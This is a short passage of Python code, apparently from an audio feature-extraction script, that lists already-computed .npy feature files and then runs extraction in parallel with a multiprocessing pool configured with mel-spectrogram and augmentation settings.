os.walk(out_dir): for _fn in files: fn = _fn.replace('.npy', '') all_feat.append(fn) # for f in all_feat: # if f in fp_dict: # del fp_dict[f] # print('{} clips left.'.format(len(fp_dict.keys()))) # for f in fp_dict: # print(f) # return pool = Pool(processes=n_cores, initializer=initProcess, initargs=(dataset, all_feat, lock, sr, win_size, hop_size, n_mels, aug_type)) result = pool.map(func, fp_dict.values()) pool.close() pool.join()